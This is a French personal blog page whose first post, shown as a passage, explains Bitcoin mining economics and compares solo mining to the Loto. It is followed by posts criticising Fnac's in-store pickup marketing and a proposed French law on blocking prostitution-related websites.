En fait, plus précisément, chaque ordinateur cherche sa solution : car dans le paquet, il indique la transaction vers son compte, qui bénéficiera des Bitcoins qui rémunéreront son travail pour le paquet. Donc chacun trouve des valeurs SHA256 totalement différentes.

Le premier à trouver une solution a gagné. Il empoche le nombre de Bitcoins attribués au paquet (25 actuellement, 50 au début, et ce nombre va se réduire au fil du temps), et les commissions sur toutes les transactions du paquet.

La difficulté du problème (le nombre de chiffres prédéterminés dans la sortie) est ajustée afin qu’en moyenne, un nouveau paquet soit calculé toutes les 10 minutes.

Quel intérêt concret à être mineur ?

Évidemment, les ordinateurs rapides sont avantagés, et après l’exploitation des capacités de calcul rapide des cartes graphiques 3D, il existe maintenant des circuits électroniques spécialisés pour calculer beaucoup plus vite des hachages de paquets Bitcoin. Après les FPGA (circuits reprogrammables par le client), plus rapides moins gourmands en électricité (merci à Y. Rougy pour la précision) que les cartes graphiques, le Bitcoin est entré dans l’ère des ASIC (circuits intégrés classiques, fabriqués en usine pour cette application particulière, beaucoup plus rapides).

Ainsi, à la difficulté actuelle, il faudrait en moyenne 6882 années à mon ordinateur de bureau (14 millions de hachages par seconde) pour trouver un bloc et gagner 25 bitcoins. C’est ce que me dit ce calculateur de minage. Côté Litecoin, les algorithmes et difficultés sont différents, il ne me faudrait qu’environ 11 ans d’après https://www.litecoinpool.org/calc.

Pour comparaison, avec les circuits spécialisés les plus rapides du moment cités sur cette page de comparaison des performances matérielles, il faut environ 4 jours par bloc Bitcoin.

Plus il existe d’ordinateurs dans le réseau, et plus ils sont rapides, plus la difficulté est augmentée afin qu’il ne soit pas trop facile de créer de la monnaie et que le rythme moyen reste constant. Je ne sais pas si la réciproque est vraie (mais je pense que oui, le protocole semblant bien pensé) : on peut imaginer que la force de calcul se réduise soudainement, soit par disparition d’une équipe de mineurs, soit par panne, etc.

Il existe en tout cas une véritable course aux capacités de calcul : l’ajout de capacité avantage celui qui la détient, mais pousse la difficulté générale à la hausse, toutes choses égales par ailleurs en termes de services effectifs rendus.

La rentabilité du minage de bitcoins dépend du cours de celui-ci, de la difficulté des calculs et des coûts d’investissement et de fonctionnement (électricité et climatisation, notamment). Si l’activité est très rentable, elle attirera beaucoup de mineurs, ce qui en réduira mécaniquement la rentabilité de deux manières, augmentation de la difficulté et répartition des gains sur un plus grand nombre de mineurs.

Groupes de minage ou minage solo

Il existe un écueil au minage : les temps élevés pour découverte d’un bloc. On gagne beaucoup, mais très rarement, et rien du tout la plupart du temps. C’est pour cela que des groupes se constituent, visant à multiplier les chances de récupérer des blocs, et lissant les gains en les répartissant au sein du groupe.

Cette page sur le wiki Bitcoin présente plus en détail l’activité des groupes de mineurs, et ce comparatif décrit les groupes, notamment les différentes façons de répartir les gains.

La gestion de groupes introduit un autre problème intéressant : le taux de découverte de bloc étant très faible, comment s’assurer que les mineurs qui ne trouvent pas cherchent effectivement et ne sont pas des parasites qui ne viennent qu’empocher leur part des gains ? Des méthodes ont été inventées pour donner des preuves de travail.

Solo = Loto ?

Pour rire, j’ai voulu comparer les espérance de gain du minage en solo à celles, assez similaires, d’un gain de 5 numéros au Loto pour quelqu’un qui jouerait une fois par semaine.

Sauf erreur de ma part, donc :

  • gain (calculé sur un cours de 600€ par bitcoin soit 25 bitcoins = 15 000€) environ 6 fois plus faible
  • chances de gain 3 fois plus élevée (temps moyen par bloc : 6882 ans au lieu de 20 000 ans environ)
  • dépense équivalente : en supposant une consommation de l’ordinateur d’environ 100 W donc 16,8 KWh chaque semaine, soit 2,23€, contre 2€ la grille de Loto.
  • et je n’ai pas inclus le coût d’acquisition et d’amortissement de l’ordinateur.
  • il faut ajouter, aux gains du Bitcoin, les commissions de transaction, qui représentent relativement peu actuellement (environ 0,2 à 0,4 bitcoin par bloc en général ; tout cela est visible sur blockchain.info)

Je précise que cette évaluation à la louche ne tient pas compte d’autres facteurs potentiels, notamment les refus peut-être plus probables d’un bloc si votre ordinateur est vraiment très lent, ou des délais de transmission, qui réduisent peut-être notablement les chances effectives de gains. En effet je n’ai jamais trouvé un bloc Bitcoin de ma vie, ce qui n’est pas étonnant quand on sait que je n’ai pas beaucoup tenté ma chance.

Si on intègre les rapports complets du Loto (tous les gains, pour toutes les combinaisons de chiffres), c’est moins glorieux pour le Bitcoin. En effet, au Loto on peut espérer récolter environ 1€ par semaine, soit 358 000 euros en 6882 années, ce qui représente 24 fois les gains en Bitcoin au cours actuel.

Mais, quand on se rappelle que tout cela chatouille gentiment les pieds des États, des banques centrales et des banques de détail, ce que ne fait pas du tout le Loto, on conviendra que cette satisfaction immatérielle a elle aussi une certaine valeur.

Commentaires et corrections bienvenus, bien entendu.

1 tip so far
0.00088101 BTC

Like this post? Tip me with bitcoin!

1Q8DATVZc3NsrTa26oRCNy3H2CaqaMBJnM

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂

Leçon de très mauvais marketing par la Fnac, “agitateur”

Petit exemple caractéristique des errements du marketing Fnac qui se débat dans des contradictions non ou mal résolues.

Hier, mon fils tombe lors d’une visite dans un magasin Fnac sur la nouvelle version de son jeu préféré, Skylanders swap force pour PS3, sorti le 18 octobre.

Évidemment il souhaite l’acheter tout de suite avec ses économies, mais supposant qu’il est possible de trouver facilement des promotions sur ce type de produit, je lui explique qu’on va attendre un peu pour regarder d’abord les prix sur Internet.

Résumé :

Nantis de ces informations, nous décidons hier soir de l’acheter ce matin à la Fnac en raison de l’option retrait 1 heure en magasin qui figure de façon proéminente sur fnac.com. Pour bénéficier du prix réduit il ne suffit pas d’acheter directement car le magasin Fnac ne s’aligne bien sûr pas sur le prix fnac.com, il faut d’abord commander sur le site.

Et là, que dit fnac.com ? (cliquer pour agrandir la copie d’écran)

fnac

Les produits culturels ne peuvent pas être retirés en 1h en magasin.
Pour vous faire livrer dans votre magasin, ajoutez votre produit à votre panier, puis à l’étape « livraison », cliquez sur l’Onglet « Retrait Magasin » et sélectionnez le magasin souhaité. Le délai de livraison est de 2 à 6 jours selon les magasins, dès l’expédition de votre commande.

Je comprends que la Fnac ait du mal à faire le grand écart entre ses magasins classiques et la concurrence en ligne.

Mais le jeu est en rayon en magasin donc le délai de 2 à 6 jours est totalement artificiel — et la mention “retrait 1h” en bannière, à la limite de la publicité mensongère.

Comme je n’aime pas qu’on se moque de moi, et tant qu’à payer le prix fort, nous avons donc acheté le jeu dans le magasin Micromania du même centre commercial avec un accueil bien plus sympathique.

Mes enfants ont bien retenu la leçon pour leurs futurs achats.

 

No tips yet.
Be the first to tip!

Like this post? Tip me with bitcoin!

1LFAzAWDWvJmu2iRuiADhP7USs7XBUbg7F

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂

Blocages inutiles de sites Internet : lutte contre la prostitution

Il est difficile d’écrire sur un sujet pareil, sauf à risquer de passer pour un sans-cœur souhaitant perpétuer l’exploitation de la misère humaine.

Il existe depuis des décennies une tendance politico-médiatique bien identifiée, celle des lois d’affichage, fondées consciemment ou non sur une constatation simple : il est plus facile et pas forcément moins efficace électoralement de dire et faire croire que l’on agit plutôt que d’agir efficacement.

La prostitution est illégale en France.

La prostitution n’est ni interdite ni autorisée en France, d’après Wikipedia. Un flou artistique typiquement français.

On pourrait penser le sujet clos d’un point de vue législatif.

Or une nouvelle proposition de loi souhaite renforcer les moyens de lutte contre celle-ci.

Je ne vais pas débattre de la pertinence ou non de cette interdiction, c’est un long débat et pas du tout ma spécialité.

Mais, comme de nombreuses personnes l’avaient craint lors du vote des lois sur le jeu en ligne, la tentation du blocage de sites s’étend peu à peu de manière pavlovienne à de nouveaux domaines d’activité, sans considération de son efficacité déjà intrinsèquement douteuse.

Ainsi, la nouvelle proposition de loi suggère d’instaurer un blocage soumis simplement au bon vouloir d’une administration — donc une nouvelle fois en toute opacité, sans le contrôle a priori d’un juge :

http://www.assemblee-nationale.fr/14/propositions/pion1437.asp :

« Lorsque les nécessités de la lutte contre le proxénétisme et la traite des êtres humains aux fins d’exploitation sexuelle relevant des articles 225-4-1, 225-5 et 225-6 du code pénal le justifient, l’autorité administrative notifie aux personnes mentionnées au 1 du présent I les adresses électroniques des services de communication au public en ligne contrevenant aux dispositions de cet article, auxquelles ces personnes doivent empêcher l’accès sans délai. Les décisions de l’autorité administrative peuvent être contestées devant le juge administratif dans les conditions de droit commun. »

Cela pourrait déjà être critiquable en soi.

Mais il est extrêmement facile de vérifier sans quitter sa chaise que les sites d'”escortes” comportent en général une mention de ce style pour échapper à la qualification de prostitution, donc a fortiori de proxénétisme ou de traite des êtres humains :

Les services proposés sont ceux d’une accompagnatrice de luxe. Toute autre relation qui pourrait intervenir relèverait de la vie privée entre deux adultes consentants et serait détachée de la prestation.

Autrement dit, les sites supposés visés par la future loi y échappent déjà à l’heure actuelle. Ils ne seront pas bloqués. Un joli coup d’épée dans l’eau. À moins, bien pire, que cela donne à l’administration le pouvoir de bloquer arbitrairement ce qui pourrait selon elle dissimuler un service de prostitution non ouvertement annoncé comme tel.

Par ailleurs, la différence avec les jeux en ligne est évidente : ici le site ne sert que de vitrine, alors que dans le cas des jeux en ligne, il constitue l’activité proprement dite.

Comme dans le cas de la lutte contre la pédophilie, le blocage ou la fermeture du site ne changeront donc strictement rien à l’activité sous-jacente. Un autre coup d’épée dans l’eau.

On peut donc, une nouvelle fois, parler de tartufferie au sens presque littéral.

Si j’avais mauvais esprit — un écueil dans lequel je ne voudrais pas tomber –, j’y verrais une volonté d’étendre à nouveau la mainmise du politique sur Internet, afin d’essayer de le civiliser, autant que peuvent l’être les média audiovisuels déjà sous la coupe le bienveillant patronage du CSA et de présidents de chaînes publiques nommés en toute indépendance.

Mise à jour 21/10/2013 : un article complet sur cette loi chez Camille.

 

No tips yet.
Be the first to tip!

Like this post? Tip me with bitcoin!

12ZoWVLbSTYMWAefKBtbe1LR6yGo8pqsek

If you enjoyed reading this post, please consider tipping me using Bitcoin. Each post gets its own unique Bitcoin address so by tipping you're also telling me what you liked, in addition to contributing to the blog hardware and electricity, and perhaps a few beers if you don't mind 🙂